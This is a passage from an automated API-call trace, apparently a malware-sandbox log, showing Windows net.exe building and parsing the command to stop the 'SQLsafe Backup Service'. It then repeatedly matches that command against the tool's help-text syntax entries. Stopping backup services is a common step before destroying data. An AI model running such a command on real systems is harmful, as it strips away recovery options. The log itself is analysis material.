_Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0126.643] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0126.643] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0126.643] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0126.643] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.643] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0126.643] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0126.643] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0126.643] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.643] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.644] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0126.644] GetFileType (hFile=0x0) returned 0x0 [0126.644] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x5f3ab8 [0126.644] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x5f3ab8, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0126.644] WriteFile (in: hFile=0x0, lpBuffer=0x5f3ab8, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x27f7c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f7c0, lpOverlapped=0x0) returned 0 [0126.644] LocalFree (hMem=0x5f3ab8) returned 0x0 [0126.644] GetFileType (hFile=0x0) returned 0x0 [0126.644] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5f37b8 [0126.645] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5f37b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n_", lpUsedDefaultChar=0x0) returned 2 [0126.645] WriteFile (in: hFile=0x0, lpBuffer=0x5f37b8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f7c0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f7c0, lpOverlapped=0x0) returned 0 [0126.645] LocalFree (hMem=0x5f37b8) returned 0x0 [0126.645] wcscpy_s (in: _Destination=0x27f878, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0126.645] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0126.645] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0126.645] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0126.645] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="“SQLsafe", _MaxCount=0xffffffff | out: _Destination="NET stop “SQLsafe") returned 0x0 [0126.645] wcsncat_s (in: _Destination="NET stop “SQLsafe", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “SQLsafe ") returned 0x0 [0126.645] wcsncat_s (in: _Destination="NET stop “SQLsafe ", _SizeInWords=0x200, _Source="Backup", _MaxCount=0xffffffff | out: _Destination="NET stop “SQLsafe Backup") returned 0x0 [0126.645] wcsncat_s (in: _Destination="NET stop “SQLsafe Backup", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop “SQLsafe Backup ") returned 0x0 [0126.645] wcsncat_s (in: _Destination="NET stop “SQLsafe Backup ", _SizeInWords=0x200, _Source="Service”", _MaxCount=0xffffffff | out: _Destination="NET stop “SQLsafe Backup Service”") returned 0x0 [0126.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_댸å'Ѱå") returned 0xad [0126.645] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{minu", _MaxCount=0x21) returned 18 [0126.645] LocalFree (hMem=0x5f5508) returned 0x0 [0126.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x2e [0126.645] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET COMPUTER\r\n\\\\computername {/AD", _MaxCount=0x21) returned 16 [0126.645] LocalFree (hMem=0x5f5508) returned 0x0 [0126.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x7d [0126.645] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET CONFIG SERVER\r\n[/AUTODISCONNE", _MaxCount=0x21) returned 16 [0126.645] LocalFree (hMem=0x5f5508) returned 0x0 [0126.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x26 [0126.645] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET CONFIG\r\n[SERVER | WORKSTATION", _MaxCount=0x21) returned 16 [0126.645] LocalFree (hMem=0x5f5508) returned 0x0 [0126.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x19 [0126.645] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x21) returned 16 [0126.645] LocalFree (hMem=0x5f5508) returned 0x0 [0126.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x1b [0126.645] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x21) returned 13 [0126.645] LocalFree (hMem=0x5f5508) returned 0x0 [0126.645] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xbe [0126.646] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET GROUP\r\n[groupname [/COMMENT:\"", _MaxCount=0x21) returned 12 [0126.646] LocalFree (hMem=0x5f5508) returned 0x0 [0126.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x33 [0126.646] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET HELP\r\ncommand\r\n -or-\r\nNET", _MaxCount=0x21) returned 11 [0126.646] LocalFree (hMem=0x5f5508) returned 0x0 [0126.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x19 [0126.646] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x21) returned 11 [0126.646] LocalFree (hMem=0x5f5508) returned 0x0 [0126.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xc1 [0126.646] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET LOCALGROUP\r\n[groupname [/COMM", _MaxCount=0x21) returned 7 [0126.646] LocalFree (hMem=0x5f5508) returned 0x0 [0126.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x16 [0126.646] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x21) returned 3 [0126.646] LocalFree (hMem=0x5f5508) returned 0x0 [0126.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x33 [0126.646] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET SESSION\r\n[\\\\computername] [/D", _MaxCount=0x21) returned 15 [0126.646] LocalFree (hMem=0x5f5508) returned 0x0 [0126.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x234 [0126.646] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET SHARE\r\nsharename\r\n s", _MaxCount=0x21) returned 12 [0126.646] LocalFree (hMem=0x5f5508) returned 0x0 [0126.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x13 [0126.646] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START BROWSER\r\n", _MaxCount=0x21) returned 14 [0126.646] LocalFree (hMem=0x5f5508) returned 0x0 [0126.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x14 [0126.646] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x21) returned 14 [0126.646] LocalFree (hMem=0x5f5508) returned 0x0 [0126.646] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x14 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START EVENTLOG\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x15 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START MESSENGER\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x15 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START NET LOGON\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x16 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x11 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START RPCSS\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x14 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START SCHEDULE\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x12 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START SERVER\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xf [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START UPS\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x17 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START WORKSTATION\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x18 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x2a [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET STATISTICS\r\n[WORKSTATION | SE", _MaxCount=0x21) returned 14 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x15 [0126.647] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x21) returned 19 [0126.647] LocalFree (hMem=0x5f5508) returned 0x0 [0126.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x58 [0126.648] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET TIME\r\n\r\n[\\\\computername | /DO", _MaxCount=0x21) returned -1 [0126.648] LocalFree (hMem=0x5f5508) returned 0x0 [0126.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x184 [0126.648] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET USE\r\n[devicename | *] [\\\\comp", _MaxCount=0x21) returned -2 [0126.648] LocalFree (hMem=0x5f5508) returned 0x0 [0126.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xc7 [0126.648] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET USER\r\n[username [password | *", _MaxCount=0x21) returned -2 [0126.648] LocalFree (hMem=0x5f5508) returned 0x0 [0126.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x47 [0126.648] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET VIEW\r\n[\\\\computername [/CACHE", _MaxCount=0x21) returned -3 [0126.648] LocalFree (hMem=0x5f5508) returned 0x0 [0126.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xc2 [0126.648] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NET\r\n [ ACCOUNTS | COMPUTER | ", _MaxCount=0x21) returned 19 [0126.648] LocalFree (hMem=0x5f5508) returned 0x0 [0126.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x319 [0126.648] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="SERVICES\r\nNET START can be used t", _MaxCount=0x21) returned -5 [0126.648] LocalFree (hMem=0x5f5508) returned 0x0 [0126.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x483 [0126.648] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="SYNTAX\r\nThe following conventions", _MaxCount=0x21) returned -5 [0126.648] LocalFree (hMem=0x5f5508) returned 0x0 [0126.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xa86 [0126.648] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="NAMES\r\nThe following types of nam", _MaxCount=0x21) returned 4 [0126.648] LocalFree (hMem=0x5f5508) returned 0x0 [0126.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x54 [0126.648] _wcsnicmp (_String1="NET stop “SQLsafe Backup Service”", _String2="\r\nFor more information on tools s", _MaxCount=0x21) returned 97 [0126.648] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xad [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET ACCOUNTS\r\n[/FORCELOG", _MaxCount=0x18) returned 18 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x2e [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET COMPUTER\r\n\\\\computer", _MaxCount=0x18) returned 16 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x7d [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET CONFIG SERVER\r\n[/AUT", _MaxCount=0x18) returned 16 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x26 [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET CONFIG\r\n[SERVER | WO", _MaxCount=0x18) returned 16 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x19 [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET CONTINUE\r\nservice\r\n\r", _MaxCount=0x18) returned 16 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x1b [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET FILE\r\n[id [/CLOSE]]\r", _MaxCount=0x18) returned 13 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xbe [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET GROUP\r\n[groupname [/", _MaxCount=0x18) returned 12 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x33 [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x18) returned 11 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x19 [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET HELPMSG\r\nmessage#\r\n\r", _MaxCount=0x18) returned 11 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0xc1 [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET LOCALGROUP\r\n[groupna", _MaxCount=0x18) returned 7 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x16 [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x18) returned 3 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x33 [0126.649] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET SESSION\r\n[\\\\computer", _MaxCount=0x18) returned 15 [0126.649] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x234 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x18) returned 12 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x13 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START BROWSER\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x14 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x14 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START EVENTLOG\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x15 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START MESSENGER\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x15 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START NET LOGON\r\n", _MaxCount=0x18) returned 14 [0126.650] LocalFree (hMem=0x5f5508) returned 0x0 [0126.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="唈_⡋盺'唈_'") returned 0x16 [0126.650] _wcsnicmp (_String1="NET stop “SQLsafe Backup", _String2="NET START 